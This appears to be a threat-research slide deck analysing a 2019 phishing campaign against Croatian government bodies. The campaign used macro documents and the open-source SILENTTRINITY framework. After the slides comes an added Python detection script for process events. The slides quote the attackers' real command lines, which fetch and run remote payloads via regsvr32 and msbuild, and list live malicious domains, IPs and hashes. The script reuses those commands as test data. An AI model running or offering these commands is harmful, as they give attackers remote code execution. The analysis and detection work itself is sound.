# IronPython on the dark side: the silent trio from Croatia

#### Alexey Vishnyakov, Senior specialist / Positive Technologies

-----

## whoami

• Senior specialist at the Expert Security Center, Positive Technologies
• Threat research
• APT group tracking
• Software development
• Reporting

-----

## Agenda

• Payload delivery
• SilentTrinity framework
• Attack infrastructure
• Takeaways
• IOCs

-----

## Payload delivery

• Last printed: 2018-07-25 00:12:30 (UTC)
• Last saved: 2019-04-01 16:28:07 (UTC)
• First VT submission: 2019-04-02 09:58:13 (UTC)
• Country: HR (Croatia)
• Codepage: 1252 ANSI Latin 1; Western European (Windows)
• Author: Windows User
• Last modified by: Teken

[Screenshot: document metadata of the first malicious document]

-----

## Payload delivery

• Comments (document property): cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell"): objShell.Run "net use https://postahr.vip", 0, False: Wscript.Sleep 10000: objShell.Run "regsvr32 /u /n /s /i:https://postahr.vip/page/1/update.sct scrobj.dll", 0, False: Set objShell = Nothing > C:\users\%username%\appdata\local\microsoft\silent.vbs

[Slide annotations: "WebDAV server" (the net use target), "Squiblydoo technique" (regsvr32 loading a remote scriptlet via scrobj.dll)]

-----

## Payload delivery

• After opening:

[Screenshot: the document as first displayed]

-----

## Payload delivery

• After allowing macro:

[Screenshot: the document after macros are enabled]

-----

## Payload delivery

• VBA macro:

[Screenshot: macro code; annotations: "VBS drop", "Autorun only, no launch"]

-----

## Payload delivery

• VBA macro:

[Screenshot: macro code; annotation: "Some kind of builder?"]
-----

## Payload delivery

• issuu.com:
• stackoverflow.com:
• dummies.com:

[Screenshots: public pages matching fragments of the macro]

-----

## Payload delivery

• Downloaded update.sct:

[Screenshot: update.sct contents, part 1]

-----

## Payload delivery

• Downloaded update.sct:

[Screenshot: update.sct contents, part 2]

-----

## Payload delivery

• rastamouse.me:
• github.com:

[Screenshots: public sources the scriptlet is based on]

-----

## Payload delivery

• Deserialized object: a .NET PE
• SharpPick: an application that loads and runs PowerShell code via the .NET assemblies

-----

## Payload delivery

• PowerPick GitHub project

[Screenshot: PowerPick repository page]

-----

## Payload delivery

• dnSpy decompilation:

[Screenshot: decompiled .NET code]

-----

## Payload delivery

• Base64 decoded:

[Screenshot: decoded payload]

-----

## Payload delivery

• PowerShell script, semi-beautified:

[Screenshot: PowerShell script; annotation: "RC4 decryption"]

-----

## Payload delivery

• fireeye.com:

[Screenshot: FireEye reference]

-----

## Payload delivery

• payatu.com:

[Screenshot: Payatu reference]

-----

## Payload delivery

• Last printed: 2019-04-02 08:22:56 (UTC)
• Last saved: 2019-04-02 08:23:28 (UTC) (~16 hours after the first document)
• First VT submission: 2019-04-02 16:52:56 (UTC) (~7 hours after the first document)
• Country: HR (Croatia)
• Last modified by: Luzer

-----

## Payload delivery

• Comments (document property): cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell"):objShell.Run "C:\windows\system32\cmd.exe /c net use \\176.105.255.59\webdav",0:Wscript.Sleep 60000: objShell.Run "%windir%\Microsoft.Net\Framework\v4.0.30319\msbuild.exe \\176.105.255.59\webdav\msbuild.xml", 0, False: Set objShell = Nothing > C:\users\%username%\appdata\local\microsoft\silent.vbs

[Slide annotations: "SMB server" (the net use target), "MSBuild inline technique" (msbuild.exe executing a project file from the remote share)]

-----

## Payload delivery

• Previous vs current macro:

[Screenshot: macro diff; annotation: "Launch added"]

-----

## Payload delivery

• Downloaded msbuild.xml:

[Screenshot: msbuild.xml contents, part 1]

-----

## Payload delivery

• Downloaded msbuild.xml:

[Screenshot: msbuild.xml contents, part 2]

-----

## Payload delivery

• Is an example publicly available?
[Screenshot: public example of the MSBuild inline-task project]

-----

## Payload delivery

• Deserialized object: a .NET PE
• SILENTTRINITY?

-----

## Payload delivery

• A few old documents
• First VT submission: 2018-08-23 13:20:23 (UTC); Country: HR (Croatia); Last modified by: Stringer
• First VT submission: 2018-08-29 09:04:26 (UTC); Country: ?; Last modified by: Stringer

-----

## Payload delivery

• Two macros from the old documents:

[Screenshot: macro code; annotations: "Download via certutil", "Launch via WMI"]

-----

## Payload delivery

• New vs old macro:

[Screenshot: macro diff; annotation: "Comments from the guidelines"]

-----

## SilentTrinity framework

• https://www.instagram.com/silenttrinity

Sophisticated and mysterious hacker! No doubt!

[Screenshot: the unrelated Instagram account]
-----

## SilentTrinity framework

• Created: 2018-10-06
• Author: Marcello Salvati
• https://github.com/byt3bl33d3r/SILENTTRINITY
• https://www.convergeconference.org/speakers/marcello-salvati/
• https://www.blackhillsinfosec.com/team/marcello-salvati/
• https://www.irongeek.com/i.php?page=videos/derbycon8/track-2-05-ironpython-omfg-marcello-salvati
• https://twitter.com/byt3bl33d3r

[Screenshot: SILENTTRINITY repository page]

-----

## SilentTrinity framework

[Screenshot: framework overview]

-----

## SilentTrinity framework

• The most interesting features:
• IronPython/Boo languages supported
• Everything runs in memory
• Diffie–Hellman key exchange
• ZIP and jobs are AES encrypted
• Proxy support
• HTTP/HTTPS

-----

## SilentTrinity framework

[Screenshot: framework console]

-----

## Attack infrastructure

• Domains under WhoisGuard, Inc. (Panama) privacy protection

|Domain|Registered On|Mimics|Industry|
|---|---|---|---|
|konzum.win|2018-05-25|konzum.hr|Retail|
|postahr.online|2018-08-22|posta.hr|Postal services|
|posteitaliane.live|2019-01-16|posteitaliane.it|Postal services|
|postahr.vip|2019-02-06|posta.hr|Postal services|

-----

## Attack infrastructure

• IPs related to the hosting provider Breezle LLC (Amsterdam, Netherlands)
• 176.105.254.52
• 176.105.255.59
• 93.170.105.32

-----

## Attack infrastructure

[Diagram: infrastructure map linking the Breezle LLC IPs and the WhoisGuard Inc. domains]
-----

## Takeaways

• News of the attack: 2019-04-03

[Screenshot: news report]

-----

## Takeaways

• Victims: Croatian government departments

[Screenshot: news report]

-----

## Takeaways

• How to defend?
• Application control over trusted software (certutil, regsvr32, msbuild, net, wmic …)
• Inspection of links in mail
• Periodic memory scans

-----

## Takeaways

• A completely open-source, yet powerful and effective, kill chain
• The first SilentTrinity framework abuse we know of
• Metasploit, Empire, Koadic …: pros for red teams, cons for defenders

-----

## IOCs

• 13db33c83ee680e0a3b454228462e73f
• hxxps://postahr.vip/page/1/update.sct
• 0adb7204ce6bde667c5abd31e4dea164
• 831b08d0c650c8ae9ab8b4a10a199192
• hxxps://posteitaliane.live/owa/mail/archive.srf
• [\\]176.105.255.59\webdav\msbuild.xml
• hxxps://176.105.255.59:8089
• 79e72899af1e50c18189340e4a1e46e0
• 92530d1b546ddf2f0966bbe10771521f

-----

## IOCs

• 78184cd55d192cdf6272527c62d2ff89
• hxxp://198.46.182.158/bat3.txt
• c84b7c871bfcd346b3246364140cd60f
• hxxps://konzum.win/bat3.txt
• 92530d1b546ddf2f0966bbe10771521f
• 176.105.254.52
• postahr.online
• 93.170.105.32
• geomeny.bid

-----

# Thank you!

##### Alexey Vishnyakov avishnyakov@ptsecurity.com

-----
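As an added detection example (not from the talk or from Positive Technologies), the following Python turns the two delivery chains quoted in the "Comments" slides and the trusted-software list from the "How to defend?" slide into rules run over process-creation events; the event format, rule names and sample rows are constructed assumptions.

```python
import re

# Constructed Sysmon-style process-creation events: (parent image, image, command line).
# The command lines reproduce the delivery chains quoted in the slides; the last
# two rows are benign look-alikes that the rules must NOT flag.
SAMPLE_EVENTS = [
    ("WINWORD.EXE", "cmd.exe",
     'cmd.exe /c echo Set objShell = CreateObject("Wscript.Shell") > C:\\users\\bob\\appdata\\local\\microsoft\\silent.vbs'),
    ("wscript.exe", "net.exe", "net use https://postahr.vip"),
    ("wscript.exe", "regsvr32.exe",
     "regsvr32 /u /n /s /i:https://postahr.vip/page/1/update.sct scrobj.dll"),
    ("wscript.exe", "net.exe", "net use \\\\176.105.255.59\\webdav"),
    ("wscript.exe", "msbuild.exe", "msbuild.exe \\\\176.105.255.59\\webdav\\msbuild.xml"),
    ("explorer.exe", "msbuild.exe", "msbuild.exe C:\\src\\app\\app.csproj"),
    ("cmd.exe", "regsvr32.exe", "regsvr32 /s C:\\Program Files\\Vendor\\lib.dll"),
]

# (rule name, regex on the image name, regex on the command line); matched case-insensitively.
RULES = [
    ("cmd_echo_drops_script", r"^cmd\.exe$", r"\becho\b.*>\s*\S+\.vbs\b"),
    ("net_use_remote_share", r"^net1?\.exe$", r"\buse\b\s+(?:https?://|\\\\)"),
    ("squiblydoo_regsvr32", r"^regsvr32\.exe$", r"/i:https?://\S+.*\bscrobj\.dll\b"),
    ("msbuild_remote_project", r"^msbuild\.exe$", r"(?:\\\\[\w.\-]+\\|https?://)\S+\.(?:xml|csproj|proj)\b"),
    ("certutil_download", r"^certutil\.exe$", r"-urlcache\b|https?://"),
    ("wmic_process_create", r"^wmic\.exe$", r"\bprocess\b.*\bcall\b.*\bcreate\b"),
]

# Parents that have no business launching the LOLBins named on the "How to defend?" slide.
SCRIPT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "wscript.exe", "cscript.exe"}
LOLBINS = {"certutil.exe", "regsvr32.exe", "msbuild.exe", "net.exe", "net1.exe", "wmic.exe"}


def match_rules(parent, image, cmdline):
    """Return the names of every rule the event triggers (empty list if clean)."""
    hits = [name for name, image_re, cmd_re in RULES
            if re.search(image_re, image, re.I) and re.search(cmd_re, cmdline, re.I)]
    if parent.lower() in SCRIPT_PARENTS and image.lower() in LOLBINS:
        hits.append("script_host_spawns_lolbin")
    return hits


def scan(events):
    """Map each event index to its rule hits, keeping only events that fired."""
    return {i: hits for i, ev in enumerate(events) if (hits := match_rules(*ev))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx][2][:60], "->", ", ".join(hits))
```

The parent-process rule is what catches the chain even if the command-line patterns change, which is the application-control point the talk makes.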